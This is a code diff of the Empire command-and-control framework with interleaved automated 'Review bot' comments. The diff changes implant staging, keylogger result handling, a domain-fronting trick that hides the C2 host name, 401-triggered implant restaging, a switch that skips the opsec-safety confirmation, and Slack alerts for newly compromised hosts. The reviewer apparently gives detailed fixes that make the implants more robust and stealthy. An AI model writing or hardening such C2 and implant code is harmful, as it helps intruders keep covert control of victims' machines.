\"autorun show\"" + line = line.strip() + if not line: + print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'") + return + cmds = line.split(' ') + resourceFile = cmds[0] + language = None + if len(cmds) > 1: + language = cmds[1].lower() + elif not resourceFile == "show" and not resourceFile == "clear": + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 
'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'") + return + #show the current autorun settings by language or all + if resourceFile == "show": + if language: + if self.mainMenu.autoRuns.has_key(language): + print self.mainMenu.autoRuns[language] + else: + print "No autorun commands for language %s" % language + else: + print self.mainMenu.autoRuns + #clear autorun settings by language or all + elif resourceFile == "clear": + if language and not language == "all": + if self.mainMenu.autoRuns.has_key(language): + self.mainMenu.autoRuns.pop(language) + else: + print "No autorun commands for language %s" % language + else: + #clear all autoruns + self.mainMenu.autoRuns.clear() + #read in empire commands from the specified resource file + else: + self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True) def do_list(self, line): @@ -956,7 +1057,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.do_list("agents " + str(line)) - def do_rename(self, line): "Rename a particular agent." @@ -1013,12 +1113,6 @@ class AgentsMenu(cmd.Cmd): except KeyboardInterrupt: print '' - - def do_creds(self, line): - "Display/return credentials from the database." - self.mainMenu.do_creds(line) - - def do_clear(self, line): "Clear one or more agent's taskings." @@ -1412,7 +1506,7 @@ class AgentsMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class AgentMenu(cmd.Cmd): +class AgentMenu(SubMenu): """ An abstracted class used by Empire to determine which agent menu type to instantiate. 
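Review bot: `do_autorun` hands the file name straight to `self.mainMenu.buildQueue(resourceFile, True)`, which raises a plain `Exception` when the path does not exist, and nothing here catches it, so a typo in the path propagates out of the command handler instead of being reported. Wrap the call: `try: self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)` / `except Exception as e: print helpers.color(str(e))`. Because `cmds = line.split(' ')` splits on every space, a resource path containing a space is also cut before it reaches buildQueue; `line.rsplit(' ', 1)` keeps the path intact while still separating the trailing language. The docstring fragment `"autorun \"` appears to have lost its placeholder (probably the file and language arguments) and is worth restoring.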
@@ -1421,25 +1515,24 @@ class AgentMenu(cmd.Cmd): agentLanguage = mainMenu.agents.get_language_db(sessionID) - if agentLanguage.lower() == 'powershell': - agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - elif agentLanguage.lower() == 'python': - agent_menu = PythonAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - else: - print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + if agentLanguage.lower() == 'powershell': + agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + elif agentLanguage.lower() == 'python': + agent_menu = PythonAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + else: + print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) -class PowerShellAgentMenu(cmd.Cmd): +class PowerShellAgentMenu(SubMenu): """ The main class used by Empire to drive an individual 'agent' menu. """ def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) - self.mainMenu = mainMenu self.sessionID = sessionID self.doc_header = 'Agent Commands' @@ -1461,7 +1554,6 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) - # def preloop(self): # traceback.print_stack() 
@@ -1469,49 +1561,22 @@ class PowerShellAgentMenu(cmd.Cmd): """ Handle agent event signals. """ + if '[!] Agent' in signal and 'exiting' in signal: pass name = self.mainMenu.agents.get_agent_name_db(self.sessionID) - if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal): # display any results returned by this agent that are returned - # while we are interacting with it + # while we are interacting with it, unless they are from the powershell keylogger results = self.mainMenu.agents.get_agent_results_db(self.sessionID) - if results: - if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results): - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID) - if not os.path.abspath(savePath).startswith(safePath): - dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') - return - with open(savePath,"a+") as f: - new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: - print "\n" + results + if results and not sender == "AgentsPsKeyLogger": + print "\n" + results elif "[+] Part of file" in signal and "saved" in signal: if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" 
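Review bot: The added `if '[!] Agent' in signal and 'exiting' in signal: pass` at the top of `handle_agent_event` is a no-op — execution falls through to the same name lookup and checks either way — so it reads as an unfinished intent. Either remove it or make it `return` if agent-exit notices are meant to be ignored in this menu, and say so in a comment such as `# agent exit notices are reported by the agents menu; nothing to print here`. This is hedged: the def line and the signals this handler receives are outside the hunk.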
@@ -1531,27 +1596,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Command not recognized.") print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.") - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." @@ -1559,8 +1603,7 @@ class PowerShellAgentMenu(cmd.Cmd): print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n") print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n" else: - cmd.Cmd.do_help(self, *args) - + SubMenu.do_help(self, *args) def do_list(self, line): "Lists all active agents (or listeners)." @@ -1572,7 +1615,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_rename(self, line): "Rename the agent." @@ -1588,7 +1630,6 @@ class PowerShellAgentMenu(cmd.Cmd): else: print helpers.color("[!] Please enter a new name for the agent") - def do_info(self, line): "Display information about this agent" @@ -1596,7 +1637,6 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) - def do_exit(self, line): "Task agent to exit." @@ -1709,7 +1749,6 @@ class PowerShellAgentMenu(cmd.Cmd): self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command) - # update the agent log msg = "Tasked agent to kill process: " + str(process) self.mainMenu.agents.save_agent_log(self.sessionID, msg) 
@@ -2285,13 +2324,11 @@ class PowerShellAgentMenu(cmd.Cmd):
return self.mainMenu.complete_creds(text, line, begidx, endidx)
-class PythonAgentMenu(cmd.Cmd):
+class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
- cmd.Cmd.__init__(self)
-
- self.mainMenu = mainMenu
+ SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
@@ -2312,9 +2349,6 @@ class PythonAgentMenu(cmd.Cmd):
if results:
print "\n" + results.rstrip('\r\n')
- # def preloop(self):
- # traceback.print_stack()
-
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals.
@@ -2334,51 +2368,13 @@ class PythonAgentMenu(cmd.Cmd):
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
-
- # print a nicely formatted help menu
- # stolen/adapted from recon-ng
- def print_topics(self, header, cmds, cmdlen, maxcol):
- if cmds:
- self.stdout.write("%s\n" % str(header))
- if self.ruler:
- self.stdout.write("%s\n" % str(self.ruler * len(header)))
- for c in cmds:
- self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__))
- self.stdout.write("\n")
-
-
- def emptyline(self):
- pass
-
-
def default(self, line):
"Default handler"
print helpers.color("[!] Command not recognized, use 'help' to see available commands")
-
-
- def do_back(self, line):
- "Go back a menu."
- return True
-
-
- def do_agents(self, line):
- "Jump to the Agents menu."
- raise NavAgents()
-
-
- def do_listeners(self, line):
- "Jump to the listeners menu."
- raise NavListeners()
-
-
- def do_main(self, line):
- "Go back to the main menu."
- raise NavMain()
-
-
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
- cmd.Cmd.do_help(self, *args)
+ SubMenu.do_help(self, *args)
def do_list(self, line):
@@ -2703,6 +2699,7 @@ class PythonAgentMenu(cmd.Cmd):
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" %(line.strip().rstrip("*"))
+
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
else:
@@ -2834,14 +2831,12 @@ class PythonAgentMenu(cmd.Cmd):
# return helpers.complete_path(text,line)
-class ListenersMenu(cmd.Cmd):
+class ListenersMenu(SubMenu):
"""
The main class used by Empire to drive the 'listener' menu.
"""
def __init__(self, mainMenu):
- cmd.Cmd.__init__(self)
-
- self.mainMenu = mainMenu
+ SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
@@ -2851,45 +2846,10 @@ class ListenersMenu(cmd.Cmd):
# display all active listeners on menu startup
messages.display_active_listeners(self.mainMenu.listeners.activeListeners)
- # def preloop(self):
- # traceback.print_stack()
-
- # print a nicely formatted help menu
- # stolen/adapted from recon-ng
- def print_topics(self, header, commands, cmdlen, maxcol):
- if commands:
- self.stdout.write("%s\n" % str(header))
- if self.ruler:
- self.stdout.write("%s\n" % str(self.ruler * len(header)))
- for command in commands:
- self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
- self.stdout.write("\n")
-
-
- def emptyline(self):
- pass
-
-
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
-
-
- def do_agents(self, line):
- "Jump to the Agents menu."
- raise NavAgents()
-
-
- def do_main(self, line):
- "Go back to the main menu."
- raise NavMain()
-
-
- def do_exit(self, line):
- "Exit Empire."
- raise KeyboardInterrupt
-
-
def do_list(self, line):
"List all active listeners (or agents)."
@@ -2966,7 +2926,7 @@ class ListenersMenu(cmd.Cmd):
def do_launcher(self, line):
"Generate an initial launcher for a listener."
-
+
parts = line.strip().split()
if len(parts) != 2:
print helpers.color("[!] Please enter 'launcher '")
@@ -3047,13 +3007,11 @@ class ListenersMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
-class ListenerMenu(cmd.Cmd):
+class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
- cmd.Cmd.__init__(self)
-
- self.mainMenu = mainMenu
+ SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName))
@@ -3067,39 +3025,6 @@ class ListenerMenu(cmd.Cmd):
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
-
-
- def emptyline(self):
- """
- If any empty line is entered, do nothing.
- """
- pass
-
-
- def do_back(self, line):
- "Go back a menu."
- return True
-
-
- def do_agents(self, line):
- "Jump to the Agents menu."
- raise NavAgents()
-
-
- def do_listeners(self, line):
- "Jump to the listeners menu."
- raise NavListeners()
-
-
- def do_main(self, line):
- "Go back to the main menu."
- raise NavMain()
-
-
- def do_exit(self, line):
- "Exit Empire."
- raise KeyboardInterrupt
-
-
def do_info(self, line):
"Display listener module options."
messages.display_listener_module(self.listener)
@@ -3224,15 +3149,14 @@ class ListenerMenu(cmd.Cmd):
return [s[offs:] for s in languages if s.startswith(mline)]
-class ModuleMenu(cmd.Cmd):
+class ModuleMenu(SubMenu):
"""
The main class used by Empire to drive the 'module' menu.
"""
def __init__(self, mainMenu, moduleName, agent=None):
- cmd.Cmd.__init__(self)
+ SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
- self.mainMenu = mainMenu
try:
# get the current module/name
@@ -3251,10 +3175,7 @@ class ModuleMenu(cmd.Cmd):
except Exception as e:
print helpers.color("[!] ModuleMenu() init error: %s" % (e))
- # def preloop(self):
- # traceback.print_stack()
-
- def validate_options(self):
+ def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
@@ -3288,8 +3209,9 @@ class ModuleMenu(cmd.Cmd):
print helpers.color("[!] Error: module needs to run in an elevated context.")
return False
- # if the module isn't opsec safe, prompt before running
- if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
+ # if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
+ if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
+
try:
choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
@@ -3300,48 +3222,6 @@ class ModuleMenu(cmd.Cmd):
return True
-
-
- def emptyline(self):
- pass
-
-
- # print a nicely formatted help menu
- # stolen/adapted from recon-ng
- def print_topics(self, header, commands, cmdlen, maxcol):
- if commands:
- self.stdout.write("%s\n" % str(header))
- if self.ruler:
- self.stdout.write("%s\n" % str(self.ruler * len(header)))
- for command in commands:
- self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
- self.stdout.write("\n")
-
-
- def do_back(self, line):
- "Go back a menu."
- return True
-
-
- def do_agents(self, line):
- "Jump to the Agents menu."
- raise NavAgents()
-
-
- def do_listeners(self, line):
- "Jump to the listeners menu."
- raise NavListeners()
-
-
- def do_main(self, line):
- "Go back to the main menu."
- raise NavMain()
-
-
- def do_exit(self, line):
- "Exit Empire."
- raise KeyboardInterrupt
-
-
def do_list(self, line):
"Lists all active agents (or listeners)."
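Review bot: `validate_options(self, prompt)` turns a method other menu code may still call as `validate_options()` into one that raises TypeError for that call form; the only caller I can see in this diff is `do_execute`, so this is a hedge, but `def validate_options(self, prompt=True):` keeps the old form working and makes the safe behaviour the default. The one-line docstring should also say what the new parameter means, e.g. `prompt: ask before running a module flagged OpsecSafe=False; False only for 'execute noprompt'`. The method body continues below the hunk.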
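Review bot: When `prompt` is false the OpsecSafe confirmation is skipped with no trace, yet that prompt is the only place a non-opsec-safe action is made a deliberate operator decision; record the bypass so the session log shows it, e.g. an `elif not prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):` branch that does `print helpers.color("[!] OpsecSafe prompt bypassed for %s" % self.moduleName, "red")` (or writes the same line via the agent log) before the method falls through to `return True`. The `try:` under the re-indented `if` pairs with an `except` outside the hunk, so confirm the block still closes as intended.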
@@ -3352,7 +3232,6 @@ class ModuleMenu(cmd.Cmd):
else:
print helpers.color("[!] Please use 'list [agents/listeners] '.")
-
def do_reload(self, line):
"Reload the current module."
@@ -3444,7 +3323,11 @@ class ModuleMenu(cmd.Cmd):
def do_execute(self, line):
"Execute the given Empire module."
- if not self.validate_options():
+ prompt = True
+ if line == "noprompt":
+ prompt = False
+
+ if not self.validate_options(prompt):
return
if self.moduleName.lower().startswith('external/'):
@@ -3634,16 +3517,14 @@ class ModuleMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
-class StagerMenu(cmd.Cmd):
+class StagerMenu(SubMenu):
"""
The main class used by Empire to drive the 'stager' menu.
"""
def __init__(self, mainMenu, stagerName, listener=None):
- cmd.Cmd.__init__(self)
+ SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
- self.mainMenu = mainMenu
-
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
@@ -3657,7 +3538,6 @@ class StagerMenu(cmd.Cmd):
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
-
def validate_options(self):
"Make sure all required stager options are completed."
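Review bot: `line == "noprompt"` is an exact match, so `execute NoPrompt` or `execute noprompt ` with a trailing space (which `cmd` passes through untouched) quietly falls back to prompting, and any other argument is ignored instead of rejected; `if line.strip().lower() == "noprompt": prompt = False` plus an `elif line.strip(): print helpers.color("[!] Usage: execute [noprompt]"); return` makes the switch predictable. A one-line comment above it, `# 'execute noprompt' skips the OpsecSafe confirmation in validate_options`, ties the flag to where it takes effect. `do_execute` continues below the hunk.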
@@ -3674,48 +3554,6 @@ class StagerMenu(cmd.Cmd):
return True
-
-
- def emptyline(self):
- pass
-
-
- # print a nicely formatted help menu
- # stolen/adapted from recon-ng
- def print_topics(self, header, commands, cmdlen, maxcol):
- if commands:
- self.stdout.write("%s\n" % str(header))
- if self.ruler:
- self.stdout.write("%s\n" % str(self.ruler * len(header)))
- for command in commands:
- self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
- self.stdout.write("\n")
-
-
- def do_back(self, line):
- "Go back a menu."
- return True
-
-
- def do_agents(self, line):
- "Jump to the Agents menu."
- raise NavAgents()
-
-
- def do_listeners(self, line):
- "Jump to the listeners menu."
- raise NavListeners()
-
-
- def do_main(self, line):
- "Go back to the main menu."
- raise NavMain()
-
-
- def do_exit(self, line):
- "Exit Empire."
- raise KeyboardInterrupt
-
-
def do_list(self, line):
"Lists all active agents (or listeners)."
@@ -3783,7 +3621,6 @@ class StagerMenu(cmd.Cmd):
def do_generate(self, line):
"Generate/execute the given Empire stager."
-
if not self.validate_options():
return
@@ -3814,7 +3651,6 @@ class StagerMenu(cmd.Cmd):
os.chmod(savePath, 777)
print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath))
-
else:
print stagerOutput
diff --git a/lib/common/listeners.py b/lib/common/listeners.py
index 31507dd..2a216b5 100644
--- a/lib/common/listeners.py
+++ b/lib/common/listeners.py
@@ -4,7 +4,7 @@
Listener handling functionality for Empire.
"""
-
+import sys
import fnmatch
import imp
import helpers
diff --git a/lib/common/packets.py b/lib/common/packets.py
index e47325a..4913639 100644
--- a/lib/common/packets.py
+++ b/lib/common/packets.py
@@ -200,14 +200,7 @@ def parse_result_packet(packet, offset=0):
taskID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
if length != '0':
- if length % 4:
- #padding fix
- datapart = packet[12+offset:12+offset+length]
- datapart += '=' * (4 - length % 4)
- data = base64.b64decode(datapart)
- else:
- data = base64.b64decode(packet[12+offset:12+offset+length])
- #data = base64.b64decode(packet[12+offset:12+offset+length])
+ data = base64.b64decode(packet[12+offset:12+offset+length])
else:
data = None
remainingData = packet[12+offset+length:]
diff --git a/lib/common/stagers.py b/lib/common/stagers.py
index b062403..5f4b236 100644
--- a/lib/common/stagers.py
+++ b/lib/common/stagers.py
@@ -18,6 +18,7 @@ import fnmatch
import imp
import helpers
import os
+import errno
import macholib.MachO
import shutil
import zipfile
@@ -443,6 +444,15 @@ class Stagers:
javacode = file.read()
file.close()
javacode = javacode.replace("LAUNCHER",launcherCode)
+ jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/'
+ try:
+ os.makedirs(jarpath)
+ except OSError as e:
+ if e.errno != errno.EEXIST:
+ raise
+ else:
+ pass
+
file = open(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java','w')
file.write(javacode)
file.close()
@@ -460,6 +470,7 @@ class Stagers:
return jar
+
def generate_upload(self, file, path):
script = """
$b64 = "BASE64_BLOB_GOES_HERE"
diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py
index cb652be..0421df5 100755
--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
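Review bot: Removing the server-side "padding fix" makes `parse_result_packet` strict about input that branch existed to tolerate, so an agent staged from an earlier build (which, judging by the new padding added in `agent.py`, sent unpadded data) now hits `base64.b64decode` with incorrect padding on every result — `TypeError` on Python 2 — and unless the listener wraps this call that is an unhandled exception per packet. Keeping the tolerant branch for one release, or catching the decode error here and returning `data = None`, avoids a mixed-version fleet going dark. Separately, the context line `if length != '0':` compares the int that `struct.unpack` returned with the string `'0'`, so it is always true and the `data = None` branch is dead; `if length:` is what was meant. The function continues below the hunk.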
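Review bot: The `else: pass` after `raise` in the new `makedirs` guard is dead code; `if e.errno != errno.EEXIST: raise` alone says it. A why-comment would help the next reader, since the EEXIST tolerance is what lets the jar be regenerated without failing on the second run: `# tolerate an existing class dir so the jar can be rebuilt in place`. The enclosing method starts above the hunk.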
@@ -111,6 +111,16 @@ class Listener:
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
+ },
+ 'SlackToken' : {
+ 'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
+ 'Required' : False,
+ 'Value' : ''
+ },
+ 'SlackChannel' : {
+ 'Description' : 'The Slack channel or DM that notifications will be sent to.',
+ 'Required' : False,
+ 'Value' : '#general'
}
}
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index d0e70f0..e4f4d5f 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -1,5 +1,6 @@
import logging
import base64
+import sys
import random
import os
import ssl
@@ -107,7 +108,7 @@ class Listener:
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
- 'Description' : 'URI for the stager. Example: stager.php',
+ 'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
@@ -295,10 +296,11 @@ class Listener:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
- #If host header defined, assume domain fronting is in use and add a call to the base URL first
- #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
- if headerKey.lower() == "host":
- stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
+ #If host header defined, assume domain fronting is in use and add a call to the base URL first
+ #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+ if headerKey.lower() == "host":
+ stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
+
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
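Review bot: `SlackToken` puts a bearer-equivalent secret in the same options dict as ordinary settings, so it will be shown by whatever prints listener options and persisted wherever listener options are stored (I cannot see either from this hunk, hence hedged). Until the option system can mask it, say so in the description: `'Description' : 'SlackBot API token for new-agent notifications (secret: do not paste listener output).'`. The `'#general'` default means a set token posts to a public channel by default; an empty default forcing the operator to choose is safer for a notification that names newly compromised hosts.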
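Review bot: The re-indented fronting block still relies on `headerValue = header.split(':')[1]` two lines above it, which drops everything after a second colon, so a `Host: cdn.example.com:443` loses its port silently; `header.split(':', 1)` keeps the remainder intact. Both `headerKey` and `headerValue` are then interpolated into the PowerShell stager between double quotes with no escaping, so a value containing `"` or `$` breaks or changes the generated script — either escape them or add `# header values are trusted operator input; not escaped` so the assumption is visible. The enclosing method starts above the hunk.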
@@ -494,7 +496,7 @@ class Listener:
randomizedStager += line
if obfuscate:
- randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
+ randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@@ -585,7 +587,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
- code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
+ code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
@@ -708,6 +710,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
+ if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+ # restart key negotiation
+ Start-Negotiate -S "$ser" -SK $SK -UA $ua
+ }
}
}
}
@@ -758,6 +764,10 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
+ #if signaled for restaging, exit.
+ if HTTPError.code == 401:
+ sys.exit(0)
+
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
@@ -884,7 +894,7 @@ def send_message(packets=None):
if 'not in cache' in results:
# signal the client to restage
- print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
+ print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
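Review bot: Any HTTP 401 now triggers `Start-Negotiate`, and 401 is not something only the team server emits — an authenticating proxy or captive portal in the path returns it on every request, which would make the agent re-run staging (a fresh key exchange and a loud restage event on the server) on each failed POST with nothing bounding the loop. Gate the restage on the server's own signal rather than the bare status code, e.g. also require the body to equal the listener's `default_response()` or carry a marker, and cap the number of renegotiations. The retry also reuses `$SK`, so it silently assumes the staging key has not changed since the agent was built; a comment `# assumes the listener's StagingKey is unchanged` records that. `Start-Negotiate` itself is defined outside this hunk.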
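Review bot: On a 401 the python agent calls `sys.exit(0)` where the PowerShell agent re-negotiates, so "signaled for restaging" here actually terminates the implant unless something outside the hunk relaunches it — the comment should state which, e.g. `# 401 = server no longer has our session; exit so the stager re-runs the agent`, or the behaviour should match the PowerShell path. This hunk keeps `return (HTTPError.code, '')` for other codes, which is correct; the parallel hunks in http_foreign.py and http_hop.py in this diff drop it and should be brought in line. `send_message` continues outside the hunk.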
@@ -963,7 +973,18 @@ def send_message(packets=None):
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
- context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
+ pyversion = sys.version_info
+
+ # support any version of tls
+ pyversion = sys.version_info
+ if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
+ proto = ssl.PROTOCOL_TLS
+ elif pyversion[0] >= 3:
+ proto = ssl.PROTOCOL_TLS
+ else:
+ proto = ssl.PROTOCOL_SSLv23
+
+ context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py
index 1e8f7c8..4ee4322 100644
--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
+import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@@ -313,7 +314,7 @@ class Listener:
randomizedStager += line
if obfuscate:
- randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
+ randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@@ -369,7 +370,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
- code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
+ code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
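Review bot: Swapping `PROTOCOL_TLSv1_2` for `PROTOCOL_TLS` / `PROTOCOL_SSLv23` lets the listener negotiate any version the OpenSSL build offers, including TLS 1.0/1.1 and, on old builds, SSLv3; compatibility with older .NET/PowerShell hosts is presumably the point, but the floor should be stated rather than left to the library default. Right after `context = ssl.SSLContext(proto)` add `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3` (both constants exist in every version this branch targets) so the fallback never reaches SSL, and put the reason in the comment: `# accept any TLS version so old WinHTTP/.NET clients can connect; SSLv2/3 stay off`. `pyversion = sys.version_info` is assigned twice, and `proto = ssl.PROTOCOL_TLS if hasattr(ssl, 'PROTOCOL_TLS') else ssl.PROTOCOL_SSLv23` replaces the version arithmetic; the same block is copied into http_com.py and http_mapi.py in this diff and belongs in one helper.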
@@ -460,6 +461,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
+ if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+ # restart key negotiation
+ Start-Negotiate -S "$ser" -SK $SK -UA $ua
+ }
}
}
}
@@ -630,7 +635,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
- context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
+
+ # support any version of tls
+ pyversion = sys.version_info
+ if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
+ proto = ssl.PROTOCOL_TLS
+ elif pyversion[0] >= 3:
+ proto = ssl.PROTOCOL_TLS
+ else:
+ proto = ssl.PROTOCOL_SSLv23
+
+ context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py
index a03f7b2..25d7b41 100644
--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -451,6 +451,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
+ if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+ # restart key negotiation
+ Start-Negotiate -S "$ser" -SK $SK -UA $ua
+ }
}
}
}
@@ -498,7 +502,9 @@ def send_message(packets=None):
